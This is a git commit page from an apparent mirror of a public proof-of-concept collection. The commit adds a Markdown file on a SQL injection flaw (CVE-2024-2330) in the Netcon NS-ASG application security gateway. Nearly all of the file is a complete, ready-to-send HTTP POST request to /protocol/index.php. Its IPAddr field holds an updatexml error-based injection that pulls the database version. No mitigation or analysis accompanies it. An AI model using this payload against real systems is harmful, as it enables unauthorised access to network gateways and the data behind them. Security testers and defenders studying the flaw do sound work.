mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
Create 网康科技 NS-ASG 应用安全网关 SQL注入漏洞(CVE-2024-2330).md
This commit is contained in:
parent
f5dd224a66
commit
d4e4b35c10
22
网康科技 NS-ASG 应用安全网关 SQL注入漏洞(CVE-2024-2330).md
Normal file
22
网康科技 NS-ASG 应用安全网关 SQL注入漏洞(CVE-2024-2330).md
Normal file
@ -0,0 +1,22 @@
|
|||||||
|
## 网康科技 NS-ASG 应用安全网关 SQL注入漏洞(CVE-2024-2330)
|
||||||
|
|
||||||
|
|
||||||
|
## poc
|
||||||
|
```
|
||||||
|
POST /protocol/index.php HTTP/1.1
|
||||||
|
Host:
|
||||||
|
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
|
||||||
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
|
||||||
|
Accept: */*
|
||||||
|
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Sec-Fetch-Dest: empty
|
||||||
|
Sec-Fetch-Mode: cors
|
||||||
|
Sec-Fetch-Site: same-origin
|
||||||
|
Te: trailers
|
||||||
|
Connection: close
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Content-Length: 263
|
||||||
|
|
||||||
|
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
|
||||||
|
```
|
||||||
Loading…
x
Reference in New Issue
Block a user